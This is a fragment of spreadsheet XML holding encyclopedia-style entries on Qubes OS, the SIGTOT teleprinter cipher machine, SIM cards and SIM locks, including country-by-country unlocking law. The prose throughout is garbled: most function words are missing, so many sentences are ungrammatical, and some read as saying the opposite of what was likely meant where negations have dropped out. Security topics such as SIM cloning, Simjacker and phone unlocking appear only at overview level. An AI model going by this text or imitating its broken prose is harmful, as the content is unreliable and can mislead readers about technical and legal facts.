weekly: revelation though second trial realized using qubes incorrectly. treating qubes security enhanced linux distribution, though regular desktop operating system added security. this quickly frustrated difficult share files domains, take screen shots even access internet programs opened domain zero. experience greatly improved started thinking qubes multiple, separate computers happened share display screen. once began look domain island, others, qubes made sense. qubes brings domains together desktop much virtualization lets multiple operating systems server. kyle rankin linux journal reviewed qubes 2016: sure already number areas qubes provides greater security would find regular linux desktop. 2014, qubes selected finalist access innovation prize 2014 endpoint security, international human rights organization access now. also whonix tails (operating system) references external links official website qubes distrowatch qubes distrotest, free online emulator operating systems.</t>
  </si>
  <si>
    <t>SIGTOT</t>
  </si>
  <si>
    <t>sigtot one-time tape machine encrypting teleprinter communication used united states world sensitive message traffic. developed security flaws discover earlier rotor machine purpose, called sigcum. sigtot designed rosen used bell telephone 132b2 mixer sigcum. british developed similar machine called 5-uco. later improved mixer, ssm-33, replaced 131b2,the phenomenon, codenamed tempest, sensitive information leaking unintended electromagnetic radiation circuits used inside encryption machine first discovered coming 131b2 mixers used sigtot.: sigtot required large amounts tape operate continual basis, needed traffic flow security. 1955, produced 1,660,000 rolls time tape.: vol.1, logistical problems involved generation, supply destruction sufficient quantities tape limited sensitive traffic. 1950s. u.s. army security agency began developing replacement, effort later taken newly formed national security agency resulting fielding kw-26 (romulus) system. references</t>
  </si>
  <si>
    <t>SIM card</t>
  </si>
  <si>
    <t>card (full form subscriber identity module subscriber identification module) integrated circuit (ic) intended securely store international mobile subscriber identity (imsi) number related key, used identify authenticate subscribers mobile telephony devices (such mobile phones computers). technically actual physical card known universal integrated circuit card (uicc); smart card usually made embedded contacts semiconductors, primary component. practise term "sim card" refers entire unit simply contains unique serial number (iccid), international mobile subscriber identity (imsi) number, security authentication ciphering information, temporary information related local network, list services user access passwords: personal identification number (pin) ordinary use, personal unblocking (puk) unlocking. europe, serial number (ssn) also sometimes accompanied international article number (ian) european article number (ean) required registering online subscription prepaid card. also possible store contact information many cards. sims always used phones; cdma phones, needed lte-capable handsets. cards also used satellite phones, smart watches, computers, cameras.the first cards size credit bank cards; sizes reduced several times years, usually keeping electrical contacts same, larger card could smaller size. sims transferable different mobile devices removing card itself. esim replacing physical cards domains, including cellular telephony. esim uses software-based embedded unremovable euicc. history procurement card type smart card, basis silicon integrated circuit (ic) chip. idea incorporating silicon chip onto plastic card originates late 1960s. smart cards since used integrated circuit chips, along memory technologies flash memory eeprom (electrically erasable programmable read-only memory).the initially specified european telecommunications standards institute specification number 11.11. this specification describes physical logical behaviour sim. with development umts, specification work partially transferred 3gpp. 3gpp responsible development applications like 51.011) usim 31.102) etsi development physical card uicc. first card developed 1991 munich smart-card maker giesecke devrient, sold first cards finnish wireless network operator radiolinja.today, cards ubiquitous, allowing billion devices connect cellular networks around world. according international card manufacturers association (icma), billion cards manufactured globally 2016 creating $6.5 billion revenue traditional card vendors. rise cellular networks predicted drive growth addressable market card manufacturers billion cellular devices 2020. introduction embedded-sim (esim) remote provisioning (rsp) gsma disrupt traditional card ecosystem entrance players specializing "digital" card provisioning value-added services mobile network operators. design there three operating voltages cards: (iso/iec 7816-3 classes respectively). operating voltage majority cards launched 1998 cards produced subsequently compatible modern cards support modern cards allow applications load subscriber. these applications communicate handset server using application toolkit, initially specified 3gpp 11.14. (there identical etsi specification different numbering.) etsi 3gpp maintain specifications. main specifications are: etsi (the toolkit smart cards), etsi (api), etsi (application invocation), etsi (toolkit sim-likes). toolkit applications initially written native code using proprietary apis. provide interoperability applications, etsi chose java card. multi-company collaboration called globalplatform defines extensions cards, additional apis features like cryptographic security rfid contactless added. data cards store network-specific information used authenticate identify subscribers network. important iccid, imsi, authentication (ki), local area identity (lai) operator-specific emergency number. also stores carrier-specific data smsc (short message service center) number, service provider name (spn), service dialling numbers (sdn), advice-of-charge parameters value-added service (vas) applications. (refer 11.11.) cards come various data capacities, least store maximum contacts sim, room mobile network codes (mncs) network identifiers, version room mncs. this used network operators store data preferred networks, mostly used home network roaming. network operator issued card phone connect preferred network economic provider instead network operator phone discovered first. this mean phone containing card connect maximum networks, instead means card issuer specify number preferred networks. outside preferred networks, uses first best available network. iccid each internationally identified integrated circuit card identifier (iccid). iccid identifier actual card itself: i.e. identifier chip. nowadays iccid numbers also used identify esim profiles, physical cards. iccids stored cards also engraved printed card body process called personalisation. iccid defined itu-t recommendation e.118 primary account number. layout based iso/iec 7812. according e.118, number digits long, including single check digit calculated using luhn algorithm. however, phase defined iccid length opaque data field, octets digits) length, whose structure specific mobile network operator. number composed following subparts: issuer identification number (iin) maximum seven digits: major industry identifier (mii), fixed digits, telecommunication purposes. country code, digits, defined itu-t recommendation e.164. nanp countries, apart canada, i.e. prepending zero common calling code canada uses russia uses 701, i.e. appending calling code kazakhstan uses 997, even though shares calling code russia issuer identifier, digits. often identical mobile network code (mnc).individual account identification individual account identification number. length variable, every number length. often identical mobile subscription identification number (msin).check digit single digit calculated digits using luhn algorithm.with phase specification using octets iccid stored packed bcd, data field room digits hexadecimal digit used filler necessary. practice, means cards 20-digit (19+1) 19-digit (18+1) iccids use, depending upon issuer. however, single issuer always uses size iccids. confuse matters more, factories seem varying ways delivering electronic copies personalization datasets. some datasets without iccid checksum digit, others digit. required e.118, itu-t updates list current internationally assigned codes operational bulletins published twice month (the last january 2019 1163 january 2019). itu-t also publishes complete lists: january 2019, list issued december 2018 current, issuer identifier numbers december 2018. international mobile subscriber identity (imsi) cards identified individual operator networks unique international mobile subscriber identity (imsi). mobile network operators connect mobile phone calls communicate market cards using imsis. format first three digits represent mobile country code (mcc). next three digits represent mobile network code (mnc). three-digit codes allowed e.212 mainly used united states canada. digit digit mncs, example 007. next digits represent mobile subscriber identification number (msin). normally digits, fewer case 3-digit national regulations indicate total length imsi less digits. digits different country country. authentication (ki) 128-bit value used authenticating sims mobile network (for usim network, still needed parameters also needed). each holds unique assigned operator personalisation process. also stored database (termed authentication center auc) carrier's network. card designed prevent someone getting using smart-card interface. instead, card provides function, algorithm, phone uses pass data card signed this, design, makes using card mandatory unless extracted card, carrier willing reveal practice, cryptographic algorithm computing signed response (sres_1/sres_2: steps below) certain vulnerabilities allow extraction card making duplicate card. authentication process: when mobile equipment starts obtains international mobile subscriber identity (imsi) card, passes mobile operator, requesting access authentication. mobile equipment pass card card reveals information. operator network searches database incoming imsi associated operator network generates random number (rand, nonce) signs associated imsi (and stored card), computing another number, split signed response (sres_1, bits) encryption bits). operator network sends rand mobile equipment, passes card. card signs producing signed response (sres_2) gives mobile equipment. mobile equipment passes sres_2 operator network. operator network compares computed sres_1 computed sres_2 mobile equipment returned. numbers match, authenticated mobile equipment granted access operator's network. used encrypt communications mobile equipment operator. location area identity stores network state information, received location area identity (lai). operator networks divided location areas, unique number. when device changes locations, stores sends back operator network location. device power cycled, takes data sim, searches prior lai. messages contacts most cards store number messages phone book contacts. stores contacts simple "name number" pairs. entries contain multiple phone numbers additional phone numbers usually stored card. when user tries copy entries sim, handset's software breaks multiple entries, discarding information phone number. number contacts messages stored depends sim; early models stored five messages contacts, modern cards usually store contacts. formats cards made smaller years; functionality independent format. full-size followed mini-sim, micro-sim, nano-sim. cards also made embed devices. versions non-embedded cards share iso/iec 7816 arrangement. full-size full-size 1ff, form factor) first form factor appear. size credit card (85.60 53.98 0.76 mm). later smaller sims often supplied embedded full-size card removed. mini-sim mini-sim 2ff) card contact arrangement full-size card normally supplied within full-size card carrier, attached number linking pieces. this arrangement (defined iso/iec 7810 id-1/000) lets card used device requires full-size card device requires mini-sim card, breaking linking pieces. full-size longer used, suppliers refer mini-sim "standard sim" "regular sim". micro-sim micro-sim 3ff) card thickness contact arrangements, reduced length width shown table above.the micro-sim introduced european telecommunications standards institute (etsi) along scp, 3gpp (utran/geran), 3gpp2 (cdma2000), arib, association (gsma scag gsmna), globalplatform, liberty alliance, open mobile alliance (oma) purpose fitting devices small mini-sim card.the form factor mentioned december 1998 3gpp smg9 umts working party, standards-setting body cards, form factor agreed upon late 2003.the micro-sim designed backward compatibility. major issue backward compatibility contact area chip. retaining contact area makes micro-sim compatible prior, larger readers plastic cutout surrounds. also designed speed mhz) prior version. size positions pins resulted numerous "how-to" tutorials youtube videos detailed instructions mini-sim card micro-sim size.the chairman scp, klaus vedder, said etsi responded market need etsi customers, additionally strong desire invalidate, overnight, existing interface, reduce performance cards. micro-sim cards introduced various mobile service providers launch original ipad, later smartphones, april 2010. iphone first smartphone micro-sim card june 2010, followed many others. nano-sim nano-sim 4ff) card introduced october 2012, mobile service providers various countries started supply phones supported format. nano-sim measures 12.3 0.67 (0.484 0.346 0.026 reduces previous format contact area maintaining existing contact arrangements. small isolating material left around contact area avoid short circuits socket. nano-sim 0.67 (0.026 thick, compared 0.76 (0.030 predecessors. adapters devices designed sims, made thinner purpose, telephone companies give warning this.the iphone released september 2012, first device nano-sim card, followed handsets. security july 2013, karsten nohl, security researcher srlabs, described vulnerabilities cards supported des, which, despite age, still used operators. attack could lead phone remotely cloned someone steal payment credentials sim. further details research provided blackhat july 2013.in response, international telecommunication union said development "hugely significant" would contacting members.in february 2015, reported intercept gchq stolen encryption keys (ki's) used gemalto (the manufacturer billion cards annually), enabling intelligence agencies monitor voice data communications without knowledge approval cellular network providers judicial oversight. having finished investigation, gemalto claimed “reasonable grounds” believe gchq carried operation hack network 2010 2011, says number possibly stolen keys would massive.in september 2019, cathal daid, security researcher adaptive mobile security, described vulnerabilities cards contained browser library actively exploited. this vulnerability named simjacker. attackers using vulnerability track location thousands mobile phone users several countries. further details research provided virusbulletin october 2019. developments when already use, specifications developed enhanced functionality gprs. these development steps referred releases etsi. within development cycles, specification enhanced well: voltage classes, formats files introduced. usim gsm-only times, consisted hardware software. with advent umts, naming split: application hence software. hardware part called uicc. this split necessary umts introduced application, universal subscriber identity module (usim). usim brought, among things, security improvements like mutual authentication longer encryption keys improved address book. uicc "sim cards" developed countries today usually uiccs containing least application usim application. this configuration necessary older handsets solely compatible application umts security enhancements rely usim application. other variants cdmaone networks, equivalent card r-uim equivalent application csim. virtual mobile phone number provided mobile network operator require card connect phone calls user's mobile phone. embedded (esim) embedded (esim) form programmable embedded directly device. surface mount format provides electrical interface full size, cards, soldered circuit board part manufacturing process. applications requirement change card, avoids requirement connector, improving reliability security. esim provisioned remotely; end-users remove operators without need physically swap device. integrated (isim) integrated (isim) form directly integrated model chip itself. consequence smaller, cheaper reliable esims, improve security ease logistics production small devices i.e. applications. 2021, german telekom introduced nusim, "integrated iot". usage mobile phone standards cards mandatory devices. satellite phone networks iridium, thuraya inmarsat's bgan also cards. sometimes, cards work regular phones also allow customers roam satellite networks using cards satellite phone. japan's system (which shut 2012; softbank mobile already shut march 2010) also specifies sim, never implemented commercially. specification interface mobile equipment given std-27 annexe subscriber identity module expert group committee specialists assembled european telecommunications standards institute (etsi) draw specifications (gsm 11.11) interfacing smart cards mobile telephones. 1994, name simeg changed smg9. japan's current next-generation cellular systems based w-cdma (umts) cdma2000 cards. however, japanese cdma2000-based phones locked r-uim associated thus, cards interchangeable japanese cdma2000 handsets (though inserted gsm/wcdma handsets roaming purposes outside japan). cdma-based devices originally removable card, service phones bound unique identifier contained handset itself. this prevalent operators americas. first publication tia-820 standard (also known 3gpp2 c.s0023) 2000 defined removable user identity module (r-uim). card-based cdma devices prevalent asia. equivalent umts called universal integrated circuit card (uicc), runs usim application. uicc still colloquially called card. carriers card introduced significant business opportunity mvnos mobile virtual network operators lease capacity network operators rather owning operating cellular telecoms network provide card customers. mvnos first appeared denmark, hong kong, finland today exist countries, including europe, united states, canada, mexico, australia parts asia, account approximately mobile phone subscribers around world.on networks, mobile phone locked carrier card, meaning phone works cards specific carrier. this common markets mobile phones heavily subsidised carriers, business model depends customer staying service provider minimum term (typically months). cards issued providers associated contract called sim-only deals. common examples networks united states, canada, australia, poland. many businesses offer ability remove lock phone, effectively making possible phone network inserting different card. mostly, mobile handsets easily unlocked used suitable network card. countries phones subsidised, e.g., india, israel belgium, phones unlocked. where phone locked card, users easily switch networks simply replacing card network another using phone. this typical, example, among users want optimise carrier's traffic different tariffs different friends different networks, travelling internationally. 2016, carriers started using concept automatic reactivation whereby users reuse expired cards instead purchasing ones wish re-subscribe operator. this particularly useful countries prepaid calls dominate competition drives high churn rates, users return carrier shop purchase time wanted churn back operator. sim-only commonly sold product mobile telecommunications companies, "sim-only" refers type legally binding contract mobile network provider customer. contract takes form credit agreement subject credit check. within sim-only contract, mobile network provider supplies customer piece hardware, card, includes agreed amount network usage exchange monthly payment. network usage within sim-only contract measured minutes, text, data combination these. duration sim-only contract varies depending deal selected customer, available 12-month periods. sim-only contracts differ mobile phone contracts include hardware card. terms network usage, sim-only typically cost-effective contracts provider charge offset cost mobile device contract period. short contract length features sim-only made possible absence mobile device. sim-only increasing popularity quickly. 2010 monthly based mobile phone subscriptions grew cent cent mobile phone subscriptions. according german research company gfk, 250,000 sim-only mobile contracts taken july 2012 alone, highest figure since began keeping records. increasing smartphone penetration combined financial concerns leading customers save money moving onto sim-only initial contract term over. multiple-sim devices dual devices card slots cards, multiple carriers. multiple devices commonplace developing markets africa, east asia, south asia southeast asia, variable billing rates, network coverage speed make desirable consumers multiple sims competing networks. dual-sim phones also useful separate one's personal phone number business phone number, without carry multiple devices. some popular devices, blackberry keyone, dual-sim variants; however, dual-sim devices common europe lack demand. this changed mainline products apple google featuring either slots combination physical slot esim. thin thin overlay overlay) thin device shaped like card, approximately microns thick. contacts front back. used sticking regular card. provides functionality passing functionality card underneath. used bypass mobile operating network custom applications, particularly non-programmable cell phones.its surface connector connects phone place normal sim. bottom surface connector connects place phone. with electronics, modify signals either direction, thus presenting modified phone, and/or presenting modified phone sim. similar concept game genie, connects game console game cartridge, creating modified game. similar devices also developed iphones circumvent card restrictions carrier-locked models, thus allowing otherwise sim-locked iphones accept cards ones authorised accept.in 2014, equitel, mvno operated kenya's equity bank, announced intention begin issuing thin sims customers, raising security concerns competition, particularly concerning safety mobile money accounts. however, months security testing legal hearings country's parliamentary committee energy, information communications, communications authority kenya (cak) gave bank green light roll thin cards. also apple 03.48 international mobile equipment identity (imei) multimedia services identity module (isim) mobile broadband mobile equipment identifier (meid) mobile signature regional lockout cloning connector single wire protocol (swp) tethering transponder ussd codes unstructured supplementary service data: list standard codes network related functions vmac w-sim (willcom-sim) references external links 11.11 specification subscriber identity module-mobile equipment (sim-me) interface. 11.14 specification application toolkit subscriber identity module-mobile equipment (sim-me) interface 03.48 specification security mechanisms application toolkit 03.48 java realization 03.48 java itu-t e.118 international telecommunication charge card 2006 itu-t</t>
  </si>
  <si>
    <t>SIM lock</t>
  </si>
  <si>
    <t>lock, simlock, network lock, carrier lock (master) subsidy lock technical restriction built cdma mobile phones mobile phone manufacturers service providers restrict phones specific countries and/or networks. this contrast phone (retrospectively called sim-free unlocked) impose restrictions. generally phones locked accept cards certain international mobile subscriber identities (imsis); imsis restricted mobile country code (mcc; e.g., work issued country) mobile network code (mnc; e.g., at&amp;t mobility, t-mobile, vodafone, bell mobility etc.) mobile subscriber identification number (msin; i.e., used phone)additionally, phones, especially nokia phones, locked group (gids), restricting single mobile virtual network operator (mvno) certain operator. most mobile phones unlocked work network provider, phone still display original branding support features carrier. besides locking, phones also firmware installed specific network provider. example, vodafone telstra branded phone australia display relevant logo support features provided network (e.g. vodafone live!). this firmware installed service provider separate locking mechanism. most phones unbranded reflashing different firmware version, procedure recommended advanced users only. reason many network providers lock phones offer phones discount customers exchange contract network specified time period, usually three years. this business model allows company recoup cost phone life contract. such discounts worth several hundred dollars. phones locked, users might sign contract company, discounted phone, stop paying monthly bill (thus breaking contract) start using phone another network even sell phone profit. locking curbs prohibiting change network (using sim). locking common subsidized phones sold prepaid contracts. important note, however, technology associated phone must compatible technology used network carrier. cell phone work carrier work cdma network provider. likewise, cdma cell phone work cdma carrier work network provider. note newer (2013+) high mobile phones capable supporting cdma technologies, allowing customers mobile devices network. examples mobile devices apple iphone newer, motorola's pure, samsung's galaxy smart phones, mostly phones based qualcomm snapdragon chipset radio. jurisdictions, canada, chile, china, israel, singapore, illegal providers sell locked devices. countries, carriers required unlock devices require consumer unlocking. unlocking phone, however, almost universally legal. additionally, often legal carriers force locks certain amounts time, varying region. unlocking technology handset unlocked entering code provided network operator. alternative mechanisms include software running handset computer attached handset, hardware devices connect handset over-the-air carrier. usually unlock process permanent. code required remove locks phone referred master code, network code key, multilock code. phone network locked typically display following messages: network blocked, enter lock pin. there also multiple levels locks placed phone networks, block networks' cards. these usually referred "network control key" (nck) "service provider control key" (spck), additionally, regional lock exists specific europe called "region control key" (rgck). these locks removed using corresponding unlock codes, unique phone depending imei.typically, locked handset display message restricted used, requesting unlock code. recent phone models running android software, phone display message saying “sim network unlock pin” “enter network lock control key” network locked. windows phones display message, “this card used specific networks. contact customer service center unlock code”. other handsets display different messages "enter special code" "enter unlocking code," cases handset simply display message stating locked. once valid code entered, handset display "network unlocked” “network unlock successful”. unlock code verified handset generated manufacturer, typically algorithm hash trapdoor function. sometimes telecom providers change original factory unlock codes extra layer security unlocking services. various brands samsung motorola algorithm random code generator unlock codes programmed phone saved database managed manufacturer. brands unlock codes still based algorithms based imei number code reverse-engineered, stolen leaked. some handsets unlocked using software generates unlock code imei number country operator details using algorithm specific handset. other manufacturers taken cautious approach, embed random number handset's firmware retained manufacturer network whose behalf lock applied. these handsets still unlocked online services access either inside people manufacturer telecom networks, need connected computer cable specific software bypass security sim-unlock phone. sometimes done advanced calculations bypass security official times using exploits overwriting parts firmware lock status kept, often even recover phone bricked completely damaged software sense. most handsets security measures built firmware protects repeated attempts guess unlock code. after entering certain number incorrect codes phone becomes frozen. this state phone display security message phone needs service. older phones could longer used point, however modern smartphones often keep working original require extra work unlock correctly. extreme situations physical access internal hardware in-circuit debugging utilised (for example, jtag headers circuit board). such access required modify initialization software used booting. hardlocked phone telecom provider modified firmware phone make impossible manually enter unlock codes way. solution sim-unlock phone change firmware firmware modified telecom provider, so-called "unbranded firmware". economics handset manufacturers economic incentives strengthen lock security (which placates network providers enables exclusivity deals) weaken (broadening handset's appeal customers interested service provider offers it). also, making difficult unlock handset might make less appealing network service providers legal obligation provide unlock codes certain handsets certain countries. cases, sim-locked handset sold substantially lower price unlocked one, service provider expects income service. locks employed cheaper (pay-as-you-go) handsets, discounts expensive handsets require subscription provides guaranteed income. unlocked handsets higher market value, even debranded. debranding involves reflashing replacing firmware remove operator logo limitations customizations imposed handset operator, usually accomplished software designed particular handset model, however smart-phones debranded unlocked solely special software. main reason unlock handset able different card. consumers wish continue using previous provider handset traveling abroad wish connect foreign network prepaid subscription. nevertheless, fundamental principle successors, open interfaces encourage competition among multiple vendors. this reason mobile phone fact, combination phone subscriber identity module (sim). locking phone network much different built mobile phone. network operators many industrialized countries bound give phone unlocking code subscribers even expiry contract period. mobile phones multiple cards quite common india. most phones sold network locked single sim-free phones available. breaking practice known breaking common united kingdom markets. this involves purchasing subsidized handsets (usually pay-as-you-go) retail stores, unlocking phones, selling (often abroad) higher price subsidised retail price. card came handset either thrown away, sold used elsewhere. this practice legal provides facto limit extent networks willing subsidize pay-as-you-go handsets. while breaking legal, businesses also engaging illegal activities exporting box-broken phones countries, sell grey market goods without paying import duties (known carousel fraud) substituting counterfeit batteries chargers. unlocking services some companies offer online unlocking service. this service requires individuals wish unlock handset provide imei number sometimes also country operator details company, either email site. company provide unlock code handset. brands nokia samsung various services also offer special remote-unlocking software instructions, cable needed remove lock home. such companies email unlocking code software remotely unlock device. some companies also offer unlocking services require sending handset's imei number. other companies sell unlocking hardware, including devices card phone spoof original network identifier registration devices read edit handset's firmware. pricing unlocking device vary depending network locked handset model itself, unlock code unique individual handset. unlock code generators there online services provide imei unlocking service dct4 dct3 nokia mobile phones. this method unlock requires user know carrier mobile phone locked also needs provide imei. generally, older model nokia unlock codes free instantly retrievable services. unlock codes retrieved must entered mobile phone using keypad. dct4 dct3 nokia, unlock codes consist key, followed "pw+", (dct3) (dct4) digits, "+", another number ranging 1-7, finally ends "#". depending carrier phone locked codes work mobile phone. most phones respond unlock codes ending +7#, however phones configured allow seven codes work. following example dct4/dct3 unlock code: pw+931882753035021+7# dct4 dct3 nokia allow maximum five unlock attempts using unlock code method. after five incorrect codes inputted, phone allow user codes (even correct) require owner unlock methods. laws practices many countries listed form sim-locking laws specifying period locking cost obtaining unlocking codes. andorra andorra, state-owned communications mobile company mobiland sell sim-locked phones. competition, consumers usually standard mobile phones locked specific carrier. austria austria, unlocking allowed time owner device. lawsuit decided favor mobile operator encouraged unlocking phones providing links free/cheap unlocking services.t-mobile austria charges euro unlock iphone prepaid subscribers contract subscribers. subscribers finished 2-year iphone contract, t-mobile austria charges euro unlock iphone. australia australia, carriers choose whether sim/network lock handsets usually tend sim/network lock prepaid handsets. there appear regulation locking australia. professor, dale clapperton, gave talk stating bundling iphone mobile phone service could violating trade practices act. however, legal professional academic come support viewpoint. this also address locking applied subsidised iphone purchases, persistence lock beyond contractual period. belgium until 2007, belgium laws prohibiting bundling, challenged violating european directive 2005/29/ec unfair commercial practices directive. april 2009, european court justice ruled belgium struck belgium's anti-bundling law. belgian government given 2009 change law, failing european commission would commence proceedings belgium. this leaves canada, china, singapore, israel countries world forbid locking contract/phone bundling outright. chile initiated january 2012. bosnia herzegovina also: locking croatia brazil brazil, locks prohibited. however, mobile carrier must inform consumer existence lock. anatel, brazil's telecom regulator, requires carrier unlock free charge mobile phone required user. after regulation telecom operators started voluntarily unlocking devices soon purchased could leave store unlocked phone. canada under revisions canadian radio-television telecommunications commission (crtc) wireless code conduct effective december 2017, devices must sold unlocked, carriers must offer unlock phones purchased prior date free charge. fees required customer contract prepaid plan carrier.after implementation rule, bell canada initially refused offer unlocks users customers carrier contrast rogers telus), reversed course february 2018 public backlash. filing crtc august 2018, bell also stated begun reimplement locks unsold phones anti-theft safety measure (the phones unlocked activation process sold customer), citing increases theft store stocks since implementation prohibition.under original version wireless code implemented 2013, carriers required offer unlocks later calendar days start contract subsidized devices, immediately upon purchase unsubsidized device. code, however, expressly prohibit carriers charging unlock fee.prior introduction wireless code, democratic party bruce hyer first attempted mandate unlocking cell phone contracts introduced private member's bill entitled cell phone freedom 2010. would banned locking would required wireless carriers unlock phones charge cell phone contract. bill introduced sessions parliament failed pass either time. china under regulation enacted ministry industry information technology, locking phones specific carrier prohibited carriers also using type network technology. therefore, phones approved sold china never locked begin regardless whether consumer purchased phone contract not. however, since three chinese carriers uses different network technology adoption carriers started phone manufacturers disable support network technologies used carrier even phone originally designed capable supporting network technologies. such move result violation phone locking. example, iphone designed capable supporting fdd, cdma, wcdma technologies china mobile reached deal apple create special model china mobile addition off-contract retail model sold apple third party vendors capability support fdd, cdma, wcdma, technologies used china mobile, disabled, effectively making special contract model incompatible networks carriers even though phones never locked. colombia starting october 2011, mobile telephone services providers, must sell users unlocked devices provide free charge support unlock previously sold devices. this regulation ordered enable mobile number portability facilitate reduction costs ordered simultaneously. chile since chile january 2012, newly sold phones must unlocked. previously bought locked phones unlocked free. regulation place order implement mobile number portability. however, requires phones usable chilean providers. cover international unlocking outside chile, users unlocking service. related issue present since september 2017, every imei registered phone works country. local carriers, process, phone outside country, user register imei registration. croatia croatia, devices bought contract, mobile operator must provide unlock code user's request free charge. such request made immediately buying phone, operator 15-day period fulfill request. devices bought prepaid plan, user wait least months submitting request. denmark carrier choose bind contracts months contract's start. many carriers choose lock phones. only hi3g ("3") lock phones, months. phone needs unlocked within first months, carrier charge €67) unlock. after months, carrier obliged unlock phone free charge. consumer needs contact original supplier, provide imei original phone number phone sold. ecuador although specific preventing locking, december 2009 ecuador's biggest carriers, porta movistar, unlock phones previously sold them, without charge. european union countries european union (eu) legislation locking, must comply unfair commercial practices directive (directive 2005/29/ec 2005). noted above, directive successfully applied belgium overturn country's previous bundling phones contracts. however, carriers many countries necessarily associate phone's lock status customer's tie-in contract status. finland finland, carriers allowed sell sim-locked phones, allowed offer tie-in sales equipment. under finnish law, tie-in sale defined selling equipment discounted price contingent consumer also acquiring service contract seller. under terms provisional exception, valid 2006 2009, tie-in sales permitted handsets, equipment purchased tie-in sales sim-locked. lock must removed free charge conclusion tie-in contract, within maximum duration years. 2008, finnish government preparing extend exception, time, considering reducing duration tie-in contracts year. france france, locks prohibited. however, mobile operator must inform consumer existence lock, subscriber right request lock removed time. later three months subscription contract, mobile operator must "systematically free charge" provide subscriber procedure deactivate lock. proposal shorten time operators charge removing lock prior six-month three-month deadline. germany germany, appear effective regulating locking. example, iphone initially offered sale germany exclusively t-mobile, locked t-mobile's network. they began provide unlocking codes phone sued vodafone temporary injunction issued requiring t-mobile vodafone's injunction later overturned, iphone available exclusively locked t-mobile. while t-mobile germany told court would unlock iphone contract, voluntarily. while locking legal, court ruled 2012 providers must clearly inform potential customers lock.as 2015, usually prepaid mobile phones sold lock. phones sold contract stipulating monthly payments typically locked monthly payments matter network phone used on). also, providers unlock phone demand. usually charged first years purchase; afterwards unlocking free. honduras honduras, general applicable consumer relations engaged national territory provided natural legal persons, public private. this called "ley proteccion consumidor" "consumer protection honduras", approved legislative decree no.24-2008, regulates activities goods services providers stating principles must follow order operate country. article states prohibitions sellers obliged abide selling good providing service people. paragraph article states prohibited provider "place seals, adhesives, duct tapes analogous mechanisms, prevent consumer make free product, except mechanisms used manufacturer warranty purposes". even though existence law, local carriers continue apply restrictions phones sell. example, iphone sold claro honduras sim-locked,. suggests general consumer protection prohibit locking cell phones hong kong hong kong, carriers allowed sim-lock phone sole purpose tying customers network. hong kong carriers sim-lock phone protect handset subsidy, enforce mobile plan contracts protect theft. after initial purchase subsidy recovered, full cost equipment paid rental installment agreement, carrier must provide detailed procedure unlocking equipment free charge upon request. india locking common india. initially, state india different mobile network operator roaming across states prohibitive. cheaper change card high roaming charges. number inter-state travelers demanded unlocked phones. usually, phones cards sold separately. mobile phone manufacturers sell phones directly customers rather network operators. dual phones quite common use, users choosing make calls using cheaper operator suitable particular call time dual phone without even switching off. this along factors, encouraged competition among network operators brought mobile phone call charges initial (us$0.75) 1996 ₹0.50 (us$0.005 approx.) 2011. rates still differ service provider another across different tariff schemes provided operator. telecom regulatory authority india (trai) independent regulator telecommunications business india, established check call rates resolve communication related issues holds upper hand fixing call rates. israel according arrangements passed december 2010, israeli carriers banned locking handsets sold them, obligated unlock handset previously sold charge. italy italy locking laws requiring carriers must specify amount subsidies, allow subscribers obtain unlocking codes nine months paying half listed subsidies. after months, lock must removed. japan japan's ministry internal affairs communications legislated smartphones tablets released 2015, docomo, au/okinawa cellular softbank mobile (the three major carriers japan) must sold without lock upon request customers without cost customer involved. before that, 2011 2015, docomo au/okinawa cellular would remove lock phones unlock function phone kept used least months purchase. north macedonia monaco monaco, partially state-owned communications mobile company monaco telecom sell sim-locked phones. competition, consumers usually standard mobile phones locked specific carrier. montenegro netherlands dutch mobile carriers agreement netherlands' telecom regulator, opta, establish code conduct respect locking specifically, unlocking fees charged within first months lock cannot last longer months.in 2002 letter dutch secretary state economic affairs, opta stated telecom regulator decided start working formalization voluntary code conduct legislation. however, 2006 report written dutch ministry economic affairs, stated competition dutch mobile market sufficient formalization voluntary code conduct legislation needed. thus locking laws netherlands. zealand locking occurred zealand limited degree 2008 vodafone zealand announced would begin locking handsets. company planned charge unlock them, relented. speculated intention lock prompted telecom zealand building mobile network based umts technology, allowing handsets change networks first time. until point time, telecom's network (the mobile network time) based cdma technology. 2degrees also building mobile network based umts time. after pressure commerce commission, vodafone relented locking policy, unlock locked phones free owned nine months. unlocked prior this.following speculation lower cost, mnvo telecom details leaked regarding skinny mobile network, would lock handsets. 2015, vodafone, 2degrees, skinny charged unlock phones owned less months. 2020, spark charges unlock phones owned less months, unless customer monthly month plan. 2degrees dropped fees unlocking phones. norway phones sold subscription usually locked norwegian carriers. varies depending long since purchased mobile phone. after months, enter operator lock code without paying pakistan ufone started locking release smartphone named smart developed emitac services, uae. comes locked ufone only. used peru according osiptel peru's telecom regulator, article terms use, mobile carriers sell phones locked lower price 24-month contracts, also must sell unlocked devices full price. article dictates customer request unlock code free months purchase date, matter contract still place. sole exception customer cancels contract pays remaining cost, point customer request device unlocked time. osiptel plans reduce time customers must wait remove locks months. portugal 2006 study sponsored portugal regulator, anacom, handset subsidies locking concluded special regulatory concerns offering subsidized sim-locked equipment exchange signing contract tying customer particular network. network providers allowed apply locks fit, voluntarily remove choose paper, author stated average unlocking charged portuguese carriers 90-100 euros. recently approved requires network operators unlock device free charge respective contract already expired (but refuse charging least euros). also establishes limits fees operators charge unlock device still contract. romania romanian telecom regulator ancom signed code conduct several romanian carriers providing september 2009 mobile operators selling handsets locked within network inform clients whether handset locked provide unlocking upon request. "self-regulation" carriers prevent regulator actually imposing regulations them. handset purchased together electronic communications services, mobile telephony operator sells bear unlocking costs bind terminal unlocking purchase services payment fees. handset purchased part promotional package preferential price customer requires unlocking expiry minimum period provided contract communications services concluded operator, customer unlocking penalty anticipated unlocking handset. price charged unlock handsets exceed costs operation operators obliged meet unlocking requests within days. russia locking common russia, huge potentials sell unlocked phones. most mobile phones sold russia extensive bundlings, customizations well carrier-specific bloatware. beeline-branded phones always locked network operator. serbia telecommunication contracts frequent practice lock card operator phone acquired mobile operator. obstructing unlocking phone illegal consumer entitled singapore 1997, singapore's then-telecommunications regulator, telecommunication authority singapore (now infocomm media authority singapore) enforced legislation telcos (singtel, starhub, circles.life, myrepublic, telecom zero1) allowed sim-lock devices, phones, tablets smartwatches imported sold singapore. august 1997, warned least operator, selling sim-locked phones. spain 1998, then-spanish telecom regulator, tribunal defensa competencia (now comisión nacional mercados competencia), spanish mobile carriers already provided unlocking codes voluntarily within first months free months, decided establish legal framework spain. revisited decision since then, therefore sim-locking laws spain. sweden sweden, carriers required unlock handsets months since purchase. this applies on-contract phones. carriers charge (approximately $45) (approximately $50), depending carrier, unlock 